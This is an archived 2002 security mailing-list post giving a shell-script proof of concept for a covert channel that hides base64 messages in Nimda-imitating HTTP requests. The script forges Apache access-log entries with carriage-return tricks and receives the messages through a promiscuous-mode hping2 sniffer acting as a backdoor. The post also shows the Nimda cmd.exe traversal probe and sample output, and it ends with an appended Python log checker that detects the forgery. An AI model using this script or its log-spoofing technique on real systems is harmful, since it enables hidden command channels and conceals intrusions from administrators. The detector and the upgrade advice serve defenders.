Nimda covert channel
From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid)
Date: 06/19/02
- Next message: mattb: "Re: iptables and samba"
- Previous message: Michael Burnem: "Re: Preventing uploads on a specific port to internet."
- Next in thread: Ian Jones: "Re: Nimda covert channel"
- Reply: Ian Jones: "Re: Nimda covert channel"
- Reply: Darren: "Why?"
From: RainbowHat <nHiATlE@blSackholeP.mAit.edMu.invalid> Date: Tue, 18 Jun 2002 23:47:23 +0000 (UTC)
Here is a covert channel proof of concept over Nimda-imitating packets.
Apache 1.3.24 was released on 22nd March, so I decided to post today.
This proof of concept code is about "Method II".
---[ Method I
According to CERT Advisory CA-2001-26, Nimda has 16 scan patterns.
An intruder can send information (commands) overlapped in permutations of the 16.
You should check whether your external interface is in promiscuous mode or not,
using a clean `ifconfig` or other tools, with any NIDS that uses
'libpcap' turned off. Even if your httpd responded with a 404 code, a promiscuous-mode
backdoor can receive the information.
---[ Method II
If an intruder uses the CR:0x0d and LF:0x0a character code trick, they can send
more information with encryption (this example is not encrypted but encoded).
You should check whether the packet size is the same as the original Nimda's or not.
---[ Workaround
Use a hex|text viewer|editor, or a `tr` or `sed` command filter, to view
/var/log/httpd/* log files.
---[ Solution
Update to version 1.3.24 or above.
+--[ http://httpd.apache.org/ ]---
|Apache 1.3.24 Major changes
|Security vulnerabilities
|* Prevent invalid client hostnames from appearing in the log file.
+---
---[ Proof of concept code
#!/bin/sh
#
# [nimdacov] Nimda covert channel proof of concept
# (promiscuous mode backdoor)
#
# Usage: $ ./nimdacov -s    # send message from remote
#        # ./nimdacov -r    # receive (sniff) message, need root
#        $ ./nimdacov       # decode message (default)
#
# You need httpd, mimencode, nc (netcat) and hping2.
#
# RainbowHat, NO WARRANTY, educational purpose only.
#
# ___configuration___
Vdev='lo'               # external interface device to sniff
Vtgt='127.0.0.1'        # target IP
Vloc='+00'              # target local time (+00 UTC)
Vlop=''                 # target log option
#Vlop=' \"-\" \"-\"'    # User-Agent, Referer
Vsiz='343'              # responded size
Vprt='80'               # target port
# my message
Vmsg='Hello, this is Nimda covert channel!'
Vmgc='m491c'                    # magic number
Vsta="Vmgc:"; Vend=":Vmgc"      # magic number start end
Vesc='\r'                       # escape character
Vnrm='GET / HTTP/1.0'           # http normal query
# http Nimda fake query (a single line)
Vnmd='GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'

rand254() # generate random number 1 to 254
{
    local Lmin=1 Lmax=254
    # md5 of the process list as entropy; dc reduces it modulo 254 and adds 1
    echo $(ps -ef | md5sum |
        sed "y/abcdef/ABCDEF/;s/^/16i/;s/ .*/ Ai$Lmax $Lmin-1+%$Lmin+p/" | dc)
}
send() # send message
{
    # encode base64
    local Lenc="$Vsta$(echo "$Vmsg" | mimencode)$Vend"
    # random fake IP (first three octets of the target, random last octet)
    local Lfip=$(echo $Vtgt | awk -F. '{print $1 FS $2 FS $3 FS}')
    Lfip="$Lfip$(rand254) - - "
    # target local time
    local Ldat="[$(date +%d/%b/%Y:%X -ud "$Vloc hours") ${Vloc}00] "
    # http query: normal request, CR, payload, CR, fake log entry
    local Lreq="$Vnrm$Vesc$Lenc$Vesc$Lfip$Ldat"
    Lreq="$Lreq\"$Vnmd\" 404 $Vsiz$Vlop\r\n\r\n"
    # send/connect TCP
    echo -ne "$Lreq" | nc $Vtgt $Vprt
}
receive() # receive message
{
    # hping2 listen mode: dump data following the start marker
    /usr/sbin/hping2 -I $Vdev -9 $Vsta > nimdacov.rcv
}
decode() # decode message
{
    # strip everything from the end marker onwards, then base64-decode
    sed "s/$Vend.*//g" nimdacov.rcv | mimencode -u
}
case z$1 in
    z-s ) # send message
        send;;
    z-r ) # receive message
        receive;;
    * )   # decode message (default)
        decode;;
esac
---[ Results of experimentation
# ./nimdacov -r    # make interface promiscuous mode so you need root
$ ./nimdacov -s    # (from remote machine)
$ tail /var/log/httpd/access_log
127.0.0.143 - - [14/Jun/2002:17:31:50 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
$ ./nimdacov
Hello, this is Nimda covert channel!
--
Regards, RainbowHat.
To spoof or not to spoof, that is the IPv4 packet.
----+----1----+----2----+----3----+----4----+----5----+----6----+----7
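As an added defender-side example (this is not part of RainbowHat's post or script), here is a Python log checker that applies the two checks the post recommends: it makes CR and other control bytes visible the way a hex viewer or `cat -v` would, and it flags any entry whose logged request field is longer than the Nimda probe it appears to be (the "packet size" check of Method II), then base64-decodes whatever a terminal would have overwritten so the hidden message can be recovered during an investigation. The log lines are constructed; the `Vmgc:` markers and the Nimda query string are taken from the script above.

```python
"""Added example (not part of the post): flag CR/LF-forged entries in an
Apache access log, make the hidden bytes visible, and recover the payload."""
import base64
import binascii
import re
from typing import Dict, List

# The Nimda probe string from the post; a forged entry shows this tail on a
# terminal, but the line Apache actually wrote is longer than a real probe.
NIMDA_REQ = (b"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../"
             b"..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0")

# Constructed sample log (not a real capture). Line 2 has the structure the
# post's script produces: real request, CR, marker + base64 + marker, CR, then
# a fake log prefix that overwrites the start of the line when printed.
PAYLOAD = base64.b64encode(b"Hello, this is Nimda covert channel!")
SAMPLE_LOG = (
    b'10.0.0.5 - - [14/Jun/2002:17:30:01 +0000] "' + NIMDA_REQ + b'" 404 343\n'
    + b'127.0.0.1 - - [14/Jun/2002:17:31:50 +0000] "GET / HTTP/1.0\r'
    + b'Vmgc:' + PAYLOAD + b':Vmgc\r'
    + b'127.0.0.143 - - [14/Jun/2002:17:31:50 +0000] "' + NIMDA_REQ
    + b'" 404 343" 404 343\n'
    + b'10.0.0.7 - - [14/Jun/2002:17:32:10 +0000] "GET /index.html HTTP/1.0" 200 1024\n'
)

CONTROL = re.compile(rb"[\x00-\x08\x0b-\x1f\x7f]")   # CR, ESC, NUL, ...; tab and LF excluded
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")   # long base64-looking tokens


def make_visible(line: bytes) -> str:
    """Render a log line the way `cat -v` does, so a CR shows up as ^M
    instead of silently rewinding the terminal cursor."""
    out = []
    for b in line:
        if b == 0x7F:
            out.append("^?")
        elif b < 0x20 and b != 0x09:
            out.append("^" + chr(b + 0x40))
        elif b >= 0x80:
            out.append("\\x%02x" % b)
        else:
            out.append(chr(b))
    return "".join(out)


def decode_hidden(segment: bytes) -> List[str]:
    """Base64-decode any long base64 run in a hidden segment; keep printable results."""
    found = []
    for m in B64_RUN.finditer(segment):
        try:
            plain = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue
        if plain and all(0x20 <= c < 0x7F for c in plain):
            found.append(plain.decode("ascii"))
    return found


def analyze_line(line: bytes) -> Dict:
    """Return three indicators: control bytes in the line, a request field longer
    than the Nimda probe it imitates (the size check from the post), and any
    decodable payload in the segments a terminal would overwrite."""
    segments = line.split(b"\r")
    first_q, last_q = line.find(b'"'), line.rfind(b'"')
    request = line[first_q + 1:last_q] if 0 <= first_q < last_q else b""
    nimda_like = NIMDA_REQ in request
    return {
        "control_bytes": len(CONTROL.findall(line)),
        "visible": segments[-1].decode("latin-1"),    # what survives on screen
        "hidden": [make_visible(s) for s in segments[:-1]],
        "decoded": [p for s in segments[:-1] for p in decode_hidden(s)],
        "nimda_like": nimda_like,
        "oversized": nimda_like and len(request) > len(NIMDA_REQ),
    }


def analyze_log(data: bytes) -> List[Dict]:
    """Scan a whole access log (as bytes) and return findings for suspicious lines only."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        if not line:
            continue
        result = analyze_line(line)
        if result["control_bytes"] or result["oversized"]:
            result["line"] = lineno
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print("line %d: %d control byte(s), oversized=%s"
              % (f["line"], f["control_bytes"], f["oversized"]))
        for h in f["hidden"]:
            print("  hidden :", h)
        for p in f["decoded"]:
            print("  decoded:", p)
```

Run it against a real log with `analyze_log(open("access_log", "rb").read())`; reading in binary matters because the whole trick depends on raw control bytes that a text-mode reader or a pager will quietly honour rather than show. Current Apache versions escape control characters in the logged request line (a raw CR is written as the two characters `\r`), so on such servers grep for that literal sequence as well.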